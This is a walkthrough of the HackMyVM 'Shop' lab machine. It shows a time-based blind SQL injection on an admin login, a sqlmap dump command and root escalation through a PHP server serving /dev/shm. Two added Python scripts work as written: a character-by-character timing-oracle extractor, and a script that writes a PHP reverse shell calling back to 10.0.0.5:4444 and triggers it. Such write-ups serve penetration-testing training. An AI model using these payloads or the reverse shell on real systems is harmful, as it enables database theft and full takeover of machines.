HackMyVM - Shop

 



Shop by D4t4s3c is classified as easy. Like most machines, it is easy if you know how to do it and not so easy if you don't; if you have not seen blind SQL injection before then it is not that easy at all!

Find it


Scan it


So only http (80) and ssh on a high port are available.

User

Running nikto -h http://10.0.0.22 flagged /shop as interesting, and running it again against the /shop URL pointed the way forward with /shop/administrator/.


The login page can be manipulated with time-based SQL injection. Trying different SQL payloads for the username, this one
' or sleep(5)-- 
with anything in the password field makes the response come back five seconds late. (MySQL only treats -- as a comment when whitespace follows it, so keep the trailing space, or use # instead.)


When executed on the server this changes the SQL query from
SELECT something FROM table WHERE user='username' AND password='password'
to
SELECT something FROM table WHERE user='' or sleep(5)-- 
Everything after the -- is commented out, so the password check never runs and the only observable effect is the five-second delay.

Since we can't see the results of any query, what we need is a tool that automates blind SQL injection:
https://sqlmap.org/
Install it with sudo apt-get install sqlmap, or read the manual on the website!

There is probably a quicker way to do this, but...

sqlmap -u http://10.0.0.22/shop/administrator/ --forms --current-db --dump  


sqlmap asks a bunch of questions, but it sets the default answer (the capitalised letter) to the most common response, so just hitting return and seeing what happens works happily.
It tries all the combinations of queries needed to get the data out one character at a time, so it is not quick.
After about 8 minutes...
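What sqlmap is doing during those eight minutes, as an added example that is not code from the post or from sqlmap: a Python simulation of the vulnerable login query against an in-memory SQLite database with MySQL's sleep() emulated, plus a timing oracle that recovers a stored value one character at a time. The table and column names (users, username, password), the stored credentials and the 0.05-second delay are assumptions made for the simulation.

```python
import sqlite3
import time

# Added example, not from the original post. The schema, the stored credentials and
# the delay are assumptions; the real payload used sleep(5).
DELAY = 0.05  # seconds of delay the injected condition adds when it is true


def make_db():
    """Constructed stand-in for the shop database behind /shop/administrator/."""
    conn = sqlite3.connect(":memory:")
    # Emulate MySQL's SLEEP(n) so the time-based oracle works in SQLite too.
    conn.create_function("sleep", 1, lambda n: time.sleep(n) or 0)
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('bart', 's3cret!')")  # constructed data
    return conn


def build_query(username, password):
    """The vulnerable pattern: user input pasted straight into the statement."""
    return (f"SELECT username FROM users WHERE username='{username}' "
            f"AND password='{password}'")


def vulnerable_login(conn, username, password):
    """Returns True on a matching row; an attacker only sees this and the response time."""
    return conn.execute(build_query(username, password)).fetchone() is not None


def oracle(conn, condition):
    """True if the injected SQL condition holds, judged purely by how long the login takes.

    The CASE is evaluated once per row of the table, so with many rows the delay
    multiplies; that only makes a true answer easier to spot.
    """
    payload = f"' OR (CASE WHEN {condition} THEN sleep({DELAY}) ELSE 0 END)-- "
    start = time.monotonic()
    vulnerable_login(conn, payload, "anything")
    return time.monotonic() - start >= DELAY / 2


def binary_search(conn, expr, lo, hi):
    """Value of the SQL expression `expr`, assumed to lie in [lo, hi], via 'expr > mid' probes."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(conn, f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(conn, subquery):
    """Pull the scalar result of `subquery` out one character at a time through the oracle."""
    length = binary_search(conn, f"length(({subquery}))", 0, 64)
    out = ""
    for i in range(1, length + 1):
        # MySQL would use ascii(); SQLite's equivalent is unicode(). Printable ASCII only.
        code = binary_search(conn, f"unicode(substr(({subquery}), {i}, 1))", 32, 126)
        out += chr(code)
    return out


def demo():
    """Recover bart's password without ever seeing a query result."""
    conn = make_db()
    return extract(conn, "SELECT password FROM users WHERE username='bart'")


if __name__ == "__main__":
    print(demo())
```

Each probe asks "is the code of character i greater than mid?" and reads the answer from the response time, so a character costs about seven probes instead of up to 95; that is the same trick sqlmap uses. On a real target, vulnerable_login becomes an HTTP POST to the form, and DELAY has to sit well above the network jitter, which is why the real thing takes minutes rather than seconds.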

The dump contains four accounts; with some trial and error against the recovered credentials we can log on as bart.


Escalate to root

I like to run linpeas.sh on a target as it gives a good overall scan, and the more you look at its output the more you notice what is normal and what is out of place.




In the output it identifies that root is running php as a web server on port 65000, serving files from /dev/shm. /dev/shm is world-writable and the server executes any .php file in its document root, so whatever we drop there runs as root.

So just write a PHP reverse shell into /dev/shm, start a listener, and request the file over port 65000. I keep and tend to use the reverse shell file from:
php-reverse-shell | pentestmonkey (edit the $ip and $port variables at the top to point at your listener first)
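The same escalation written out as an added example, not code from the post or from pentestmonkey: it confirms the linpeas finding by parsing process-list output for a php -S command line, checks that the document root is writable, and drops a minimal PHP reverse shell there before requesting it through the root-owned server. It assumes the server was started as php -S 0.0.0.0:65000 -t /dev/shm; the process lines and the listener address are constructed.

```python
import os
import re
import urllib.request

# Added example, not from the original post. Assumes root runs PHP's built-in
# server (php -S ...) on port 65000 with /dev/shm as the document root.
PHP_SERVER = re.compile(
    r"php\S*\s+-S\s+(?P<bind>\S+?):(?P<port>\d+)(?:\s+-t\s+(?P<root>\S+))?"
)


def find_php_servers(ps_lines):
    """Parse 'ps -eo user,pid,args' output; return (user, port, docroot) for each php -S."""
    found = []
    for line in ps_lines:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        user, _pid, args = parts
        m = PHP_SERVER.search(args)
        if m:
            # php -S without -t serves the current directory of the process.
            found.append((user, int(m.group("port")), m.group("root") or "."))
    return found


def exploitable(servers):
    """Keep servers that run as root from a directory we can write to: that is the whole bug."""
    return [s for s in servers if s[0] == "root" and os.access(s[2], os.W_OK)]


def php_reverse_shell(lhost, lport):
    """Minimal reverse shell: connect back and attach /bin/sh to the socket on fds 0, 1, 2."""
    return (
        "<?php\n"
        f'$sock = fsockopen("{lhost}", {lport});\n'
        '$proc = proc_open("/bin/sh -i", array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);\n'
    )


def deploy(docroot, lhost, lport, name="shell.php"):
    """Write the payload into the served directory and return its path."""
    path = os.path.join(docroot, name)
    with open(path, "w") as f:
        f.write(php_reverse_shell(lhost, lport))
    return path


def trigger(port, name="shell.php"):
    """Request the file so the server executes it as root; the request hangs while the shell lives."""
    try:
        urllib.request.urlopen(f"http://127.0.0.1:{port}/{name}", timeout=2)
    except Exception:
        pass  # a timeout here is expected once the shell has connected back


if __name__ == "__main__":
    # Constructed process lines standing in for real ps output on the box.
    ps = [
        "root 1 /sbin/init",
        "root 612 /usr/bin/php -S 0.0.0.0:65000 -t /dev/shm",
        "www-data 700 /usr/sbin/apache2 -k start",
    ]
    for user, port, root in exploitable(find_php_servers(ps)):
        # Assumed listener: nc -lvnp 4444 on 10.0.0.5 must already be running.
        deploy(root, "10.0.0.5", 4444)
        trigger(port)
```

The parse step is the part worth keeping: linpeas already prints the process, but reading the bind address, port and -t document root off the command line yourself is how you decide whether the finding is real before writing anything to the box.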







